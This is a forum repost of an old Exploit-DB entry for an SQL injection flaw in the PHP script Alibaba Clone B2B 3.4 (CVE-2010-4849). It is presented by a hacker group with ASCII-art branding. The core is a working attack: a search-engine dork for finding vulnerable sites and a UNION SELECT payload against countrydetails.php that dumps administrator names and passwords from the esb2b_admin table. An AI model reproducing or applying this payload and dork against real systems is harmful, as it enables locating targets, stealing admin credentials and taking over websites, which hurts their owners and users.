Exploit Alibaba Clone B2B 3.4 - SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
15650
Проверка EDB
  1. Пройдено
Автор
DR.0RYX & CR3W-DZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2010-4849
Дата публикации
2010-12-01
Код:
Exploit Title:Alibaba v3.4 clone b2b(countrydetails.php) SQL Injection Vulnerability   
Date: 29.11.2010  
Author: Dr.0rYX and Cr3w-DZ  
Category: webapps/0day  
***************************************************************************************************
*           _______       ___________.__                     ___________      .__                  *
*      ____ \   _  \______\__    ___/|  |__           _____  \_   _____/______|__| ____ _____      *
*     /    \/  /_\  \_  __ \|    |   |  |  \   ______ \__  \  |    __) \_  __ \  |/ ___\\__  \     *
*    |   |  \  \_/   \  | \/|    |   |   Y  \ /_____/  / __ \_|     \   |  | \/  \  \___ / __ \_   *
*    |___|  /\_____  /__|   |____|   |___|  /         (____  /\___  /   |__|  |__|\___  >____  /   *
*         \/       \/                     \/               \/     \/                  \/     \/    *
*                                      .__  __             __                                      *
*      ______ ____   ____  __ _________|__|/  |_ ___.__. _/  |_  ____ _____    _____               *
*     /  ___// __ \_/ ___\|  |  \_  __ \  \   __<   |  | \   __\/ __ \\__  \  /     \              *
*     \___ \\  ___/\  \___|  |  /|  | \/  ||  |  \___  |  |  | \  ___/ / __ \|  Y Y  \             *
*    /____  >\___  >\___  >____/ |__|  |__||__|  / ____|  |__|  \___  >____  /__|_|  /             *
*         \/     \/     \/                       \/                 \/     \/      \/              *
*                                                        Pr!v8 Expl0iT AND t00l **                 *                                                                  
*                                      ALGERIAN HACKERS                                            *      
*********************************- NORTH-AFRICA SECURITY TEAM -*************************************
[!]             Alibaba v3.4 clone b2b(countrydetails.php) SQL Injection Vulnerability 
[!] Author    : Dr.0rYX and Cr3w-DZ
[!] MAIL      : [email protected]<mailto:[email protected]>  &  [email protected]<mailto:[email protected]>
 
***************************************************************************/
[!] notice :
 Dr.0rYX:  MY OLD EMAIL [email protected]  CLOSED
           MY NEW EMAIL IS  [email protected]

***************************************************************************/

[ Software Information ]
 
[+] Vendor : http://www.alibabaclone.com/
[+] script   : Alibaba v3.4 clone b2b 
[+] Download : http://www.alibabaclone.com/ (sell script )
[+] Vulnerability : SQL injection
[+] Dork : inurl:"countrydetails.php?es_id="

**************************************************************************/

[ Vulnerable File ]

http://server/countrydetails.php?es_id=sql[N.A.S.T ]

[ Exploit ]

http://server/countrydetails.php?es_id=-1+UNION+ALL+select+1,Group_concat(CONVERT(es_id USING utf8),0x3a,CONVERT(es_admin_name USING utf8),0x3a,CONVERT(es_pwd USING utf8)),3,4+from+esb2b_admin--

[  GReet ]

[+] : evilzone.org , exploit-db.com ,Inj3ct0r 1337 Exploit DataBase 1337db.com , ALL HACKERS MUSLIMS
 
Источник
www.exploit-db.com

Похожие темы